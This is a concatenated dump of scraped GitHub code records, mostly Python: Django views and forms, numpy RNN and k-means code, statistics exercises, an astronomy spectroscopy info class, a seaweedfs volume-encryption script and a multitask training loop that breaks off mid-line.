Applicants.objects.all()\n\n context = {\n \"applicants\":applicants\n }\n\n return render(request,\"applicants/applicants.html\",context)\n\ndef questions(request):\n if request.method == \"POST\":\n experience = request.POST[\"experience\"]\n experience3= request.POST[\"experience3\"]\n education = request.POST[\"education\"]\n income = request.POST[\"income\"]\n\n applicants = Applicants.objects.filter(experience = experience)\n\n qn2 = False\n qn3 = False\n qn4 = False\n\n if education != \"\":\n counts = Applicants.objects.filter(education=education).count()\n qn2 = True\n \n if experience3 != \"\":\n applicant3 = Applicants.objects.filter(experience = experience)\n qn4 = True\n \n # Qn 3\n if income != \"\":\n income = float(income)\n companies_income = Company.objects.filter(income__gte = income)\n qn3 = True\n\n\n context = {\n \"applicants\":applicants,\n \"counts\":{\n \"qn2\":qn2,\n \"counts\":counts\n } ,\n \"income\":{\n \"qn3\":qn3,\n \"companies\":companies_income\n } , \n \"experience\":{\n \"qn4\":qn4,\n \"applicants\":applicant3\n } \n }\n\n return render(request,\"applicants/questions.html\",context)\n return render(request,\"applicants/questions.html\")\n\n\n","repo_name":"Musa24/practical_work_logic","sub_path":"labor_exchange/applicants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30454869272","text":"#!/usr/bin/env python3\n\"\"\" Bidirectional Cell\"\"\"\n\nimport numpy as np\n\n\nclass BidirectionalCell():\n \"\"\" Bidirectional Cell\"\"\"\n\n def __init__(self, i, h, o):\n \"\"\"\n * The weights will be used on the right side for matrix\n multiplication\n * The biases should be initialized as zeros\n \"\"\"\n self.Whf = np.random.normal(size=(i + h, h))\n self.Whb = np.random.normal(size=(i + h, h))\n self.Wy = np.random.normal(size=((2 * h), o))\n self.bhf = np.zeros((1, h))\n self.bhb = np.zeros((1, h))\n self.by = np.zeros((1, o))\n\n def forward(self, h_prev, x_t):\n \"\"\"\n * Returns: h_next, the next hidden state\n \"\"\"\n xh = np.concatenate((h_prev, x_t), axis=1)\n h_next = np.tanh(np.dot(xh, self.Whf) + self.bhf)\n return h_next\n\n def backward(self, h_next, x_t):\n \"\"\"\n * Returns: h_pev, the previous hidden state\n \"\"\"\n xh = np.concatenate((h_next, x_t), axis=1)\n h_prev = np.tanh(np.dot(xh, self.Whb) + self.bhb)\n return h_prev\n\n def output(self, H):\n \"\"\"\n Returns: Y, the outputs\n \"\"\"\n t, m, h_two = H.shape\n o = self.by.shape[1]\n Y = np.zeros((t, m, o))\n for i in range(t):\n y_pred = np.dot(H[i], self.Wy) + self.by\n y_pred = np.exp(y_pred) / np.sum(np.exp(y_pred),\n axis=1, keepdims=True)\n Y[i] = y_pred\n return Y\n","repo_name":"Nzparra/holbertonschool-machine_learning","sub_path":"supervised_learning/0x0D-RNNs/7-bi_output.py","file_name":"7-bi_output.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22420245274","text":"import json\nimport numpy as np\nimport pandas as pd\nimport rich\n\n\n# Load data from BENCH\nwith open(\"L_8_3.json\") as f:\n my_list = [json.loads(line) for line in f]\ndf = pd.DataFrame(my_list)\n\n# GROUP BY Radius -> Zenith\ngrouped = df.groupby([\"radius\", \"zenith\"]).sum()\n\n# Collect separated datapoints [radius, zenith, recall]\ndatapoints = []\nfor name, group in grouped.iterrows():\n radius, zenith = name\n\n tp = group[\"tp\"]\n p = group[\"p\"]\n 
recall = tp / p\n datapoints.append(\n {\n \"radius\": radius,\n \"zenith\": zenith,\n \"recall\": recall,\n }\n )\nrich.print(datapoints)\n\n# Plot Heatmap\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf = pd.DataFrame(datapoints)\ndf = df.pivot(\"radius\", \"zenith\", \"recall\")\nsns.heatmap(df, annot=False, square=True)\nplt.show()\n","repo_name":"eyecan-ai/leakers","sub_path":"examples/benches/analyze_json.py","file_name":"analyze_json.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27739451367","text":"import random\nfrom math import pow as pow\nfrom operator import itemgetter\nfrom Calculate_J import J\nfrom copy import deepcopy\n\n#将质心的取值范围固定在数据中的最大恩格尔系数和最小恩格尔系数之间\ndef kmeans(k, dict_items, max_engle, min_engle):\n\n dict_cluster = {}\n\n tmp_cluster = {} # 暂时存储聚类后的结果\n\n J_values = [] #存储每一次聚类之后的J值\n e = 0.0000001 #判断J值收敛的误差范围\n\n N = 1 #记录迭代次数\n U = [] #初始化质心\n for i in range(0, k):\n tmp = random.uniform(min_engle, max_engle)\n U.append(tmp)\n tmp_cluster[tmp] = []\n\n\n\n flag = 0\n while flag == 0:\n\n print('第%d次迭代后'%N, '质心为:', U)\n\n for city_key in dict_items.keys():\n\n distance = {} # 存放每个城市恩格尔系数与质心的距离\n engle = dict_items[city_key]\n for n in tmp_cluster.keys():\n\n d = pow(n -engle, 2)\n distance[n] = d\n\n # 将distance按照字典的值进行排序,选出最小距离\n L = sorted(distance.items(), key=itemgetter(1))\n tmp_cluster[L[0][0]].append((city_key, engle, L[0][1]))\n\n dict_cluster = deepcopy(tmp_cluster)\n #print('聚类后结果',dict_cluster)\n J_values.append(J(dict_cluster)) # 聚类之后的J值\n\n # 更新一次质心\n N += 1\n U.clear()\n tmp_cluster.clear()\n for m in dict_cluster.keys():\n sum = 0\n for j in range(0, len(dict_cluster[m])):\n sum += dict_cluster[m][j][1]\n\n if sum == 0: #随机生成的质心可能没有一个数据点靠近它\n U.append(m)\n print('没有类别的质心:',m)\n\n else:\n new_u = sum / len(dict_cluster[m])\n U.append(new_u)\n tmp_cluster[new_u] = []\n\n\n if len(J_values) != 1:\n t = pow(J_values[-1] - J_values[-2], 2)\n if t <= e: #已收敛\n flag = 1\n\n\n\n return dict_cluster\n\n\n\n\n\n\n","repo_name":"fay0505/K-Means","sub_path":"Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74436888229","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom source.cs_1 import prepare_feature, prepare_target, compute_cost_linreg\n\n\ndef test_cs_1(df_feature_z_df_target):\n df_feature, df_target = df_feature_z_df_target\n\n X = prepare_feature(df_feature)\n target = prepare_target(df_target)\n\n assert isinstance(X, np.ndarray)\n assert isinstance(target, np.ndarray)\n assert X.shape == (506, 2)\n assert target.shape == (506, 1)\n\n # print(X)\n beta = np.zeros((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 296.0735)\n\n beta = np.ones((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 268.157)\n\n beta = np.array([-1, 2]).reshape((2,1))\n J = compute_cost_linreg(X, target, beta)\n # print(J)\n assert np.isclose(J, 308.337)","repo_name":"natalieagus/d2w_2023_cohort_lead","sub_path":"week9/tests/test_cs_1.py","file_name":"test_cs_1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"6008789309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nExample code to call Rosette 
API to get entities's relationships from a piece of text.\n\"\"\"\n\nimport argparse\nimport json\nimport os\n\nfrom rosette.api import API, DocumentParameters, RosetteException\n\n\ndef run(key, alt_url='https://api.rosette.com/rest/v1/'):\n \"\"\" Run the example \"\"\"\n # Create an API instance\n api = API(user_key=key, service_url=alt_url)\n relationships_text_data = \"FLIR Systems is headquartered in Oregon and produces thermal imaging, night vision, and infrared cameras and sensor systems. According to the SEC’s order instituting a settled administrative proceeding, FLIR entered into a multi-million dollar contract to provide thermal binoculars to the Saudi government in November 2008. Timms and Ramahi were the primary sales employees responsible for the contract, and also were involved in negotiations to sell FLIR’s security cameras to the same government officials. At the time, Timms was the head of FLIR’s Middle East office in Dubai.\"\n params = DocumentParameters()\n params[\"content\"] = relationships_text_data\n try:\n return api.relationships(params)\n except RosetteException as exception:\n print(exception)\n\n\nPARSER = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='Calls the ' +\n os.path.splitext(os.path.basename(__file__))[0] + ' endpoint')\nPARSER.add_argument('-k', '--key', help='Rosette API Key', required=True)\nPARSER.add_argument('-u', '--url', help=\"Alternative API URL\",\n default='https://api.rosette.com/rest/v1/')\n\nif __name__ == '__main__':\n ARGS = PARSER.parse_args()\n RESULT = run(ARGS.key, ARGS.url)\n print(RESULT)\n","repo_name":"rosette-api/python","sub_path":"examples/relationships.py","file_name":"relationships.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"71"} +{"seq_id":"33590682973","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 23 08:34:37 2022\n\n@author: xj9\n\"\"\"\n\nimport math\nimport matplotlib.pyplot as plt\n\ndef sum3(N = 100):\n N_totals = []\n total = 0\n for n in range(1,N+1):\n total += ((-1)**(n+1))/n\n \n N_totals.append(total)\n print(N_totals)\n plt.plot(range(n),N_totals)\n plt.show()\n \n","repo_name":"MDgaddis/Math300_Gaddis","sub_path":"Python/hw3_2.py","file_name":"hw3_2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"6139095782","text":"pA, pG, rA, rG = input().split()\npA = float(pA)\npG = float(pG)\nrA = float(rA)\nrG = float(rG)\n\nalcool = rA/pA\ngasolina = rG/pG\n\nif alcool > gasolina:\n print('A')\nelse:\n print('G')\n \n","repo_name":"henrique2020/URI","sub_path":"Python/2295.py","file_name":"2295.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"7825443144","text":"\"\"\"\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\n\n\n\"\"\"\nnums = list(map(int,input().split()))\nnew_num = set(nums)\nnew_num_len = len(new_num)\nnum_len = len(nums)\nif new_num_len == num_len:\n print(False)\nelse:\n 
print(True)","repo_name":"kiritka-jain/Leet_Code_Practice_Questions","sub_path":"Arrays/Random_Questions_easy/Day_1/contain_duplicate.py","file_name":"contain_duplicate.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8226379582","text":"#Desarrollar una función que recibe una lista y el elemento a buscar,\n#devolviendo su posición si existe y -1 en caso de que no.\n\nlista = [1,2,\"Hola\",5.6]\n\ndef buscar_lista(lista, valor):\n\ti = 0\n\ttry:\n\t\twhile True:\n\t\t\tif lista[i] == valor:\n\t\t\t\tindice = i\n\t\t\t\tbreak\n\t\t\ti += 1\n\texcept IndexError:\n\t\tindice = -1\n\tfinally:\n\t\treturn indice\n\ndef buscar_lista_2(lista, valor):\n\ttry:\n\t\tindice = lista.index(valor)\n\texcept ValueError:\n\t\tindice = -1\n\tfinally:\n\t\treturn indice\n\nprint(buscar_lista(lista,1))\nprint(buscar_lista(lista,10))\n\nprint(buscar_lista_2(lista,2))\nprint(buscar_lista_2(lista,10))\n","repo_name":"Informatorio2020/informatorio2020","sub_path":"Nelgusgom/Listaexisteono.py","file_name":"Listaexisteono.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"86284824528","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom astropy import units, constants\nimport numpy as np\n\nfrom sofia_redux.scan.info.base import InfoBase\nfrom sofia_redux.scan.utilities.utils import (\n to_header_float, insert_info_in_header)\n\n__all__ = ['SofiaSpectroscopyInfo']\n\n\nclass SofiaSpectroscopyInfo(InfoBase):\n\n velocity_unit = units.Unit('km') / units.Unit('s')\n\n def __init__(self):\n \"\"\"\n Initialize the SOFIA spectroscopy information.\n\n Contains information on SOFIA spectroscopic parameters such as the\n bandwidth, resolution, frequencies, and velocities.\n \"\"\"\n super().__init__()\n self.front_end = None\n self.back_end = None\n self.bandwidth = np.nan * units.Unit('MHz')\n self.frequency_resolution = np.nan * units.Unit('MHz')\n self.tsys = np.nan * units.Unit('Kelvin')\n self.observing_frequency = np.nan * units.Unit('MHz')\n self.image_frequency = np.nan * units.Unit('MHz')\n self.rest_frequency = np.nan * units.Unit('MHz')\n self.velocity_type = None\n self.frame_velocity = np.nan * self.velocity_unit\n self.source_velocity = np.nan * self.velocity_unit\n\n @property\n def log_id(self):\n \"\"\"\n Return the string log ID for the info.\n\n The log ID is used to extract certain information from table data.\n\n Returns\n -------\n str\n \"\"\"\n return 'spec'\n\n def apply_configuration(self):\n \"\"\"\n Update spectroscopic information with FITS header information.\n\n Updates the information by taking the following keywords from the\n FITS header::\n\n FRONTEND - The frontend device name (str)\n BACKEND - The backend device name (str)\n BANDWID - The total spectral bandwidth (MHz)\n FREQRES - The spectral frequency resolution (MHz)\n TSYS - The system temperature (K)\n OBSFREQ - The observing frequency at the reference channel (MHz)\n IMAGFREQ - The image frequency at the reference channel (MHz)\n RESTFREQ - The rest frequency at the reference channel (MHz)\n VELDEF - The velocity system definition (str)\n VFRAME - Radial velocity of the reference frame wrt observer (km/s)\n RVSYS - The source velocity wrt the observer (km/s)\n\n Returns\n -------\n None\n \"\"\"\n options = self.options\n if options is None:\n return\n mhz = units.Unit('MHz')\n self.front_end = 
options.get_string('FRONTEND')\n self.back_end = options.get_string('BACKEND')\n self.bandwidth = options.get_float('BANDWID') * mhz\n self.frequency_resolution = options.get_float('FREQRES') * mhz\n self.tsys = options.get_float('TSYS') * units.Unit('Kelvin')\n self.observing_frequency = options.get_float('OBSFREQ') * mhz\n self.image_frequency = options.get_float('IMAGFREQ') * mhz\n self.rest_frequency = options.get_float('RESTFREQ') * mhz\n self.velocity_type = options.get_string('VELDEF')\n self.frame_velocity = options.get_float('VFRAME') * self.velocity_unit\n self.source_velocity = options.get_float('RVSYS') * self.velocity_unit\n\n def get_redshift(self):\n \"\"\"\n Return the redshift of the source determined from it's velocity.\n\n The redshift is calculated as::\n\n z = sqrt( (1 + v/c) / (1 - v/c) ) - 1\n\n where v is the source velocity and c is the speed of light. I.e., the\n relativistic doppler shift along the line of sight.\n\n Returns\n -------\n redshift : float\n \"\"\"\n v_over_c = (self.source_velocity / constants.c).decompose().value\n return np.sqrt((1.0 + v_over_c) / (1.0 - v_over_c)) - 1.0\n\n def edit_header(self, header):\n \"\"\"\n Edit an image header with available information.\n\n Parameters\n ----------\n header : astropy.fits.Header\n The FITS header to apply.\n\n Returns\n -------\n None\n \"\"\"\n info = [\n ('COMMENT', \"<------ SOFIA Spectroscopy Data ------>\"),\n ('FRONTEND', self.front_end, 'Frontend device name.'),\n ('BACKEND', self.back_end, 'Backend device name.'),\n ('BANDWID', to_header_float(self.bandwidth, 'MHz'),\n '(MHz) Total spectral bandwidth.'),\n ('FREQRES', to_header_float(self.frequency_resolution, 'MHz'),\n '(MHz) Spectral frequency resolution.'),\n ('TSYS', to_header_float(self.tsys, 'K'),\n '(K) System temperature.'),\n ('OBSFREQ', to_header_float(self.observing_frequency, 'MHz'),\n '(MHz) Observing frequency at reference channel.'),\n ('IMAGFREQ', to_header_float(self.image_frequency, 'MHz'),\n '(MHz) Image frequency at reference channel.'),\n ('RESTFREQ', to_header_float(self.rest_frequency, 'MHz'),\n '(MHz) Rest frequency at reference channel.'),\n ('VELDEF', self.velocity_type, 'Velocity system definition.'),\n ('VFRAME', to_header_float(self.frame_velocity, 'km/s'),\n '(km/s) Radial velocity of reference frame wrt observer.'),\n ('RVSYS', to_header_float(self.source_velocity, 'km/s'),\n '(km/s) Source radial velocity wrt observer.')\n ]\n insert_info_in_header(header, info, delete_special=True)\n\n def get_table_entry(self, name):\n \"\"\"\n Return a parameter value for the given name.\n\n Parameters\n ----------\n name : str\n The name of the parameter to retrieve.\n\n Returns\n -------\n value\n \"\"\"\n if name == 'bw':\n return self.bandwidth.to('GHz')\n if name == 'df':\n return self.frequency_resolution.to('MHz')\n elif name == 'tsys':\n return self.tsys.to('Kelvin')\n elif name == 'fobs':\n return self.observing_frequency.to('GHz')\n elif name == 'frest':\n return self.rest_frequency.to('GHz')\n elif name == 'vsys':\n return self.velocity_type\n elif name == 'vframe':\n return self.frame_velocity.to('km/s')\n elif name == 'vrad':\n return self.source_velocity.to('km/s')\n elif name == 'z':\n return self.get_redshift()\n else:\n return 
super().get_table_entry(name)\n","repo_name":"SOFIA-USRA/sofia_redux","sub_path":"sofia_redux/scan/custom/sofia/info/spectroscopy.py","file_name":"spectroscopy.py","file_ext":"py","file_size_in_byte":6471,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"34942480603","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Week 2:\n# Basic statistical functions for data exploration\n# 1. Measures of central tendency – mean, median, mode\n# 2. Measures of data spread\n# 3. Dispersion of data – variance, standard deviation\n# 4. Position of the different data values – quartiles, inter-quartile range (IQR).\n\n# In[1]:\n\n\n#to calculate mean\nfrom collections import Counter\nnumb = [2, 3, 5, 7, 8,2,2,3,4,5,2]\nno = len(numb)\nsumm = sum(numb)\nmean = summ / no\nprint(\"The mean or average of all these numbers (\", numb, \") is\", str(mean))\n\n# to calculate median\nno = len(numb)\nnumb.sort()\nif no % 2 == 0:\n median1 = numb[no//2]\n median2 = numb[no//2 - 1]\n median = (median1 + median2)/2\nelse:\n median = numb[no//2]\nprint(\"The median of the given numbers (\", numb, \") is\", str(median))\n\n# to calulate mode\nno = len(numb)\nval = Counter(numb)\nfindMode = dict(val)\nmode = [i for i, v in findMode.items() if v == max(list(val.values()))] \nif len(mode) == no:\n findMode = \"The group of number do not have any mode\"\nelse:\n findMode = \"The mode of a number is / are: \" + ', '.join(map(str, mode))\nprint(findMode)\n\n\n# In[2]:\n\n\n#quartile and interquartile\n\ndata = sorted(list(map(int,input(\"Input numbers with space > \").split())))\nn = len(data)\ni = n // 2\n\nif n % 2 == 0:\n\tmedian = (data[i-1] + data[i])/2\n\tq3i = 0\nelse:\n\tmedian = data[i]\n\tq3i = 0\n\nnquartile = n // 2\ni = nquartile // 2\n\nif nquartile % 2 == 0:\n\tq1 = (data[i-1] + data[i])/2\n\tq3 = (data[q3i + nquartile + i - 1] + data[q3i + nquartile + i]) / 2\nelse:\n\tq1 = data[i]\n\tq3 = data[q3i + nquartile + i]\n\nprint(data)\nprint(\"Q1 =\", q1)\nprint(\"Q2 =\", median, \"(median)\")\nprint(\"Q3 =\", q3)\nprint(\"Interquartile =\", q3 - q1)\n\n\n# In[9]:\n\n\n\n#standard deviation\n\nfrom math import sqrt\nn= [11, 8, 8, 3, 4, 4, 5, 6, 6, 7, 8] \nmean =sum(n)/len(n)\nSUM= 0\nfor i in n :\n SUM +=(i-mean)**2\nstdeV = sqrt(SUM/(len(n)-1)) \nprint(stdeV)\n\n\n# In[10]:\n\n\n#variance\n#define a function, to calculate variance\ndef variance(X):\n mean = sum(X)/len(X)\n tot = 0.0\n for x in X:\n tot = tot + (x - mean)**2\n return tot/len(X)\n \n# call the function with data set\nx = [1, 2, 3, 4, 5, 6, 7, 8, 9] \nprint(\"variance is: \", variance(x))\n \ny = [1, 2, 3, -4, -5, -6, -7, -8] \nprint(\"variance is: \", variance(y))\n \nz = [10, -20, 30, -40, 50, -60, 70, -80] \nprint(\"variance is: \", variance(z))\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport statistics as st \n\n# Load the data\ndf = pd.read_csv(\"C:/Users/saile/Desktop/week2.csv\")\nprint(df.shape)\n\n\n# In[3]:\n\n\ndf.mean()\n\n\n# In[4]:\n\n\ndf.std()\n\n\n# In[5]:\n\n\ndf.var()\n\n\n# In[6]:\n\n\nfrom scipy.stats import iqr\n\n\n# \n","repo_name":"siddu808/c","sub_path":"iot_week2(without libraries).py","file_name":"iot_week2(without libraries).py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"72621951591","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport glob\nimport os\nimport ntpath\nimport shutil\nimport subprocess\nimport sys\nfrom collections 
import defaultdict\n\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"--src\", type=str, dest=\"src\",\n help=\"directory to store volume data files, the .idx and .dat files should already exist inside the dir.\")\n argparser.add_argument(\"--dst\", type=str, dest=\"dst\",\n help=\"directory to store encrypted volume data files.\")\n args = argparser.parse_args()\n src_dir = args.src\n dst_dir = args.dst\n\n if src_dir != \"\" and dst_dir != \"\":\n if not os.path.isfile(\"./transformer\"):\n print(\"please provide transformer execution binary\")\n sys.exit(-1)\n if not os.access(\"./transformer\", os.X_OK):\n print(\"please set execution permission for transformer\")\n sys.exit(-1)\n\n if not os.path.isdir(dst_dir):\n # 新目录不存在则为之创建一个\n os.makedirs(dst_dir)\n\n # 获取所有的collection-vid关系对\n src_dat_files = glob.glob(os.path.join(src_dir, \"*.dat\"))\n src_dat_files.sort()\n collection_vid_map = defaultdict(list)\n for dat_file in src_dat_files:\n filename = ntpath.basename(dat_file)\n filename_without_suffix = os.path.splitext(filename)[0]\n parts = filename_without_suffix.split(\"_\")\n collection, vid = \"_\".join(parts[:len(parts)-1]), parts[len(parts)-1]\n collection_vid_map[collection].append(vid)\n\n for collection, vids in collection_vid_map.items():\n for vid in vids:\n print(\"/-------------------- {}_{}.dat command --------------------/\".format(collection, vid))\n commands = [\n \"env ENCRYPTION_KEY=TEpSZVlpTURwRENuS0JkNXBGZzQzUT09 ./transformer\",\n \"-verbose=true\",\n \"-collection={}\".format(collection),\n \"-vid={}\".format(vid),\n \"-src={}\".format(src_dir),\n \"-dst={}\".format(dst_dir),\n ]\n print(\" \".join(commands))\n print(\"/-------------------- {}_{}.dat result --------------------/\".format(collection, vid))\n pipe_output = subprocess.check_output(\" \".join(commands), shell=True)\n print(pipe_output.decode(\"utf-8\"))\n\n src_idx_file = os.path.join(src_dir, \"{}_{}.idx\".format(collection, vid))\n src_dat_file = os.path.join(src_dir, \"{}_{}.dat\".format(collection, vid))\n dst_idx_file = os.path.join(dst_dir, \"{}_{}.idx\".format(collection, vid))\n dst_dat_file = os.path.join(dst_dir, \"{}_{}.dat\".format(collection, vid))\n # 用新索引文件替换旧索引文件\n shutil.move(dst_idx_file, src_idx_file)\n # 用新数据文件替换旧数据文件\n shutil.move(dst_dat_file, src_dat_file)\n \n # 删除临时目录\n os.rmdir(dst_dir)\n","repo_name":"amazingchow/seaweedfs-tools","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"43615567750","text":"import modules.texture_analysis as t\nimport utils as u\nimport modules.semitone as semitone\n\nIMAGES_RESOURCE = \"images/resource/7_task/\"\nIMAGES_RESULT = \"images/result/7_task/\"\n\n\ndef save_to_txt(dis_i, dis_j, path):\n file = open(path, \"a\")\n file.truncate(0)\n file.write(\"dis_i=\" + str(dis_i) + \"\\n\")\n file.write(\"dis_j=\" + str(dis_j) + \"\\n\")\n file.close()\n\n\n@u.timeit\ndef texture(sample_path, result_path):\n pix = u.picture_to_array(IMAGES_RESOURCE + sample_path)\n pix_semitone = semitone.semitone(pix)\n u.array_to_picture(pix_semitone, IMAGES_RESULT + result_path + \"semitone.png\")\n\n co_occurrence_matrix = t.get_co_occurrence_matrix(pix_semitone)\n spread_image = t.norm_matrix(co_occurrence_matrix)\n\n dis_i = t.dispersion(spread_image, 0)\n dis_j = t.dispersion(spread_image, 1)\n save_to_txt(dis_i, dis_j, IMAGES_RESULT + result_path + 
\"features.txt\")\n\n u.array_to_picture(spread_image, IMAGES_RESULT + result_path + \"visualized.png\")\n\n\ntexture(\"water.jpg\", \"water/\")\ntexture(\"grass.jpg\", \"grass/\")\ntexture(\"metal.jpg\", \"metal/\")\ntexture(\"rust.jpg\", \"rust/\")\ntexture(\"soil.jpg\", \"soil/\")\ntexture(\"tree.jpeg\", \"tree/\")\n","repo_name":"betLomo/cv","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22669086513","text":"from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.db import transaction\nfrom django.utils.translation import ugettext as _\nfrom allauth.account.forms import LoginForm\nfrom allauth.account.forms import SignupForm as BaseSignupForm\nfrom users.models import Host\n\nUser = get_user_model()\n\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta(UserCreationForm):\n model = User\n fields = ('email', 'first_name', 'last_name',)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta:\n model = User\n fields = ('email', 'first_name', 'last_name',)\n\n\nclass SignupForm(BaseSignupForm):\n first_name = forms.CharField(\n max_length=30,\n widget=forms.TextInput(attrs={'placeholder': 'First Name'})\n )\n last_name = forms.CharField(\n max_length=30,\n widget=forms.TextInput(attrs={'placeholder': 'Last Name'})\n )\n is_host = forms.BooleanField(\n required=False,\n label=_('Create a Host Profile?')\n )\n\n @transaction.atomic\n def save(self, request):\n \"\"\"\n If the 'Create Host Profile' checked, it will create a host profile object.\n It is important that transaction is atomic, since we are saving multiple\n different objects at once.\n \"\"\"\n user = super().save(request)\n is_host = self.cleaned_data['is_host']\n user.first_name = self.cleaned_data['first_name']\n user.last_name = self.cleaned_data['last_name']\n if is_host:\n host = Host.objects.create(user=user)\n host.save()\n return user\n\n# Overriding Django Allauth LoginForm to compat with Django Axes\n# https://django-axes.readthedocs.io/en/latest/usage.html#integration-with-django-allauth\nclass LoginForm(LoginForm):\n def user_credentials(self):\n credentials = super().user_credentials()\n credentials['login'] = credentials.get('email') or credentials.get('username')\n return credentials\n\n\nclass HostUpdateForm(forms.ModelForm):\n class Meta:\n model = Host\n exclude = ('user', 'slug', )\n","repo_name":"nollidnosnhoj/travel2change","sub_path":"travel2change/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31676922725","text":"import os\nimport time\n\nfrom utils.params import set_params\nfrom utils.helper import set_random_seed, AverageMeter\nfrom utils.keeper import Keeper\nfrom utils.loss import *\nfrom models import build_model\nfrom dataload import data_loader\n\n\ndef main(args):\n model = build_model(args.model_name)\n optimizer = torch.optim.Adam(model.parameters(), args.lr, weight_decay=args.weight_decay)\n # scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=100, gamma=0.5)\n\n log.info('LOSS FORMAT: SEMANTIC_LOSS MEAN_IOU PIX_ACC | DEPTH_LOSS ABS_ERR REL_ERR'\n ' | NORMAL_LOSS MEAN MED <11.25 <22.5 <30\\n')\n\n log.info('loading data...\\n')\n train_loader, val_loader = 
data_loader(args)\n train_bts, val_bts = len(train_loader), len(val_loader)\n log.info('train batch number: {0}; validation batch number: {1}'.format(train_bts, val_bts))\n\n # Whether using checkpoint\n if args.resume is not None:\n if not os.path.exists(args.resume):\n raise RuntimeError(\"=> no checkpoint found\")\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n\n optimizer.load_state_dict(checkpoint['optimizer'])\n chk_loss = checkpoint['chk_loss']\n best_loss = checkpoint['best_loss']\n args.start_epoch = checkpoint['epoch'] + 1\n else:\n best_loss = np.inf\n\n # whether using pretrained model\n if args.pretrained_net is not None and args.resume is None:\n pretrained_w = torch.load(args.pretrained_net)\n model_dict = model.state_dict()\n pretrained_dict = {k: torch.from_numpy(v) for k, v in pretrained_w.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n model.load_state_dict(model_dict)\n\n model = model.cuda() if args.use_cuda else model\n\n # -------------------- training -------------------- #\n alpha_weight = np.ones([3, args.epochs])\n T = args.temp\n for epoch in range(args.epochs):\n e_time = time.time()\n log.info('training: epoch {}/{} \\n'.format(epoch+1, args.epochs))\n\n model.train()\n cost = np.zeros(26, dtype=np.float32)\n avg_cost = np.zeros(26, dtype=np.float32)\n\n # apply Dynamic Weight Average\n if args.weight == 'dwa':\n if epoch == 0 or epoch == 1:\n alpha_weight[:, epoch] = 1.0\n else:\n w_1 = avg_cost[epoch - 1, 0] / avg_cost[epoch - 2, 0]\n w_2 = avg_cost[epoch - 1, 3] / avg_cost[epoch - 2, 3]\n w_3 = avg_cost[epoch - 1, 6] / avg_cost[epoch - 2, 6]\n alpha_weight[0, epoch] = 3 * np.exp(w_1 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n alpha_weight[1, epoch] = 3 * np.exp(w_2 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n alpha_weight[2, epoch] = 3 * np.exp(w_3 / T) / (np.exp(w_1 / T) + np.exp(w_2 / T) + np.exp(w_3 / T))\n\n for k, (train_image, train_label, train_depth, train_normal) in enumerate(train_loader):\n train_label = train_label.type(torch.LongTensor)\n if args.use_cuda:\n train_image, train_label, train_depth, train_normal = \\\n train_image.cuda(), train_label.cuda(), train_depth.cuda(), train_normal.cuda()\n\n optimizer.zero_grad()\n\n train_preds, logsigma = 